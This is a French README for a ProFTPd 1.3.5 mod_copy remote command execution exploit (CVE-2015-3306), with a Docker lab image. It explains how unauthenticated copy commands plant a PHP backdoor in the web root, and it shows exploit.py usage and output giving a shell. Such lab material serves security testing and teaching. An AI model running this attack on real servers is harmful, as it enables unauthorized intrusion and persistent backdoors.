
ProFTPd 1.3.5 - (mod_copy) Exploit d'exécution de commande à distance et conteneur vulnérable
ProFTPD est un démon FTP hautement configurable pour Unix et les systèmes d'exploitation de type Unix. ProFTPD est né du désir de disposer d'un serveur FTP sécurisé et configurable. Il s'inspire d'une admiration significative pour le serveur web Apache. Contrairement à la plupart des autres serveurs FTP Unix, il ne provient pas de l'ancienne base de code BSD ftpd, mais constitue une conception et une implémentation entièrement nouvelles.
Pour mettre en place un environnement vulnérable pour votre test, vous aurez besoin de Docker installé, et il vous suffit d'exécuter la commande suivante :
docker build -t vuln/cve-2015-3306 .
docker run --rm -it -p 21:21 -p 80:80 vuln/cve-2015-3306
Et cela déploiera une application vulnérable sur votre hôte sur les ports 21 et 80.
Le module mod_copy de ProFTPD 1.3.5 permet à des attaquants distants de lire et d'écrire des fichiers arbitraires via les commandes site cpfr et site cpto.
Tout client non authentifié peut exploiter ces commandes pour copier des fichiers de n'importe quelle partie du système de fichiers vers une destination choisie. Les commandes de copie sont exécutées avec les droits du service ProFTPD, qui s'exécute par défaut sous les privilèges de l'utilisateur « nobody ». En utilisant /proc/self/cmdline pour copier une charge utile PHP dans le répertoire du site web, l'exécution de code à distance en PHP est rendue possible.
Pour exploiter cette cible, exécutez simplement :
./exploit.py --host HOST --port PORT --path PATH
Si vous utilisez cette image vulnérable, vous pouvez simplement exécuter :
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
Après l'exploitation, un fichier nommé backdoor.php sera stocké dans le dossier racine du répertoire web. Et l'exploit vous donnera un shell dans lequel vous pourrez envoyer des commandes à la backdoor :
./exploit.py --host 127.0.0.1 --port 21 --path "/var/www/html/"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 127.0.0.1:21
[+] Target exploited, acessing shell at http://127.0.0.1/backdoor.php
[+] Running whoami: www-data
[+] Done
Cette vulnérabilité a été découverte par Vadim Melihow.
Ce programme, comme les précédents, est uniquement à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, notamment le fait que moi (t0kx) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet ne porte AUCUNE responsabilité quant au contenu ou à la mauvaise utilisation de ces programmes ou de tout dérivé de ceux-ci. En utilisant ces programmes, vous acceptez le fait que tout dommage (perte de données, crash du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de t0kx.